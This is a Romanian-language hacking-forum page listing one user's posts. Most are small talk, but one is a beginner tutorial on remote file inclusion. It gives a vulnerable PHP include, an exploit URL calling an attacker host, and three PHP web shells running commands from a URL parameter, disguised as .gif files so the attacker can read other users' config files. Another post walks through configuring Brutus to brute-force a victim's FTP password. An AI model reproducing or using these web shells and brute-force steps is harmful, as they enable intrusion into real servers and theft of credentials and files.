Jump to content

curiosul

Active Members
  • Posts

    990
  • Joined

  • Last visited

  • Days Won

    4

Posts posted by curiosul

  1. Da cred ca ar iesi ceva, avand in vedere afacerea asta cred ca nu trebuie sa investesti cine stie ce, dar ca sa ai firma si angajati iti trebuie si clienti, iar promovarea in mass-media ii destul de scumpa, dar daca punem toti mana de la mana ar merge, dar sunt si alte multe aspecte catre trebuie discutate.

    Tu ce ai scris mai sus ii doar o schema a afacerii :)

  2. Tehnica destul de celebra (RFI) , permite includerea mai multor arhive in alte servere ; majoritatea vulnerabilitatilor de genul asta se gasesc in coduri cum ar fi :

    <?

    include"$page";

    ?>

    Asta ar fi exploatat in modul urmator :

    vuln.php?page=http//[atacant]

    Normal ar fi sa trimitem la o pagina care sa poata executa comenzile.

    Arhiva poate contine :

    <?

    exec($_GET[cmd],$iesire);

    foreach($iesire as $line) { echo "$line<br>"; }

    ?>

    exec();

    <?

    system($_GET[cmd],$iesire);

    foreach($iesire as $line) { echo "$line<br>"; }

    ?>

    system();

    <?

    passthru($_GET[cmd],$salida);

    foreach($salida as $line) { echo "$line<br>"; }

    ?>

    passthru();

    Odata ce aveti arhiva cu codul , puneti o extensie .jpg sau .gif. Uploadati pe serverul victima , si totul este pregatit . Acum imaginativa ca avem adresa : http://atacant.com/xploitulnostru.gif . In xpl.gif trebuie sa fie unul din cele 3 coduri de mai sus . Fiecare cod din cele 3 foloseste o varianta distincta , pt ca unele servere pot bloca unele dintre ele .

    Acum faceti un url asa : victima.com: The Leading Personal Injury Site on the Net

    Si asta executa xploitul vostru , si primiti un fel de shell .

    Ce poti face cu asta ?

    Mai multe ... poti executa comanda cat de ex , si sa vezi arhive (de configurare de ex) , deasemenea puteti face cat in arhivele altor useri ("cd/home/gheorghe/public_html;") cat si "config.php"

    sau sa obtineti o lista de arhive ("cd/home/gheorghe/public_html;ls")

    Tutorialul nu este cine stie ce...este pentru incepatori...

    Si nu-mi asum responsabilitatea pentru contextul in care folositi tutorialul

  3. :))acuma am vazut..da io am primit tutorialul asta de la altcineva man :|

    Nu l-am luat de pe site la tine...pur si simplu mi-a dat acest trick..asta-i tot :)

    Ai putea sa verifici ip-urile de pe site la tine..ca n-am intrat niciodata decat azi...cand mi-ai dat llink-ul ala:P

    Si vorbeste si tu mai frumos omule fara coaie :)

  4. Pentru a cracka un ftp , ai nevoie de :

    brutus

    ms-dos

    Metoda e putin cam lenta, insa sigura .

    Cum se face :

    -deschide cmd si scrie : ping www.adresa.com (si obtii ipul victimei)

    -acum deschideti brutus , si unde scrie FTP , puneti ipul pe care l-ati obtinut cand ati facut pingul

    (verificati ca ftpul e activ)

    -configurati brutus :

    target : ftp:victima.com

    type : ftp

    port : 21

    connections : 34

    timeout : 10

    userid : victimaa

    passfile : biblioteca voastra de passuri

    -dupa ce ati configurat , dati start , si asteptati sa gaseasca passwordul. (poate dura ceva timp .... cu cat mai mare biblioteca ta , cu atat mai bine)

  5. Pentru a obtine o imagine mai clara adaugati :

    &feature=related&fmt=18

    Asadar ar arata cam asa :

    Cateodate filmuletele vin cu o parte din cod :

    asa ca adaugati doar ce lipseste :

    &fmt=18

    Sper sa fie de folos

  6. Cat despre revista, ne-ar trebui articole scrise de noi, nu luate dupa Google. Si nu am vazut prea multe articole scrise pe aici... Cu alte cuvinte cineva ar trebui sa munceasca, sa isi piarda o parte din timp pentru revista, si nu cred ca sunt prea multi doritori. Totusi eu m-as baga.

    Da, si sa stie limba romana...

×
×
  • Create New...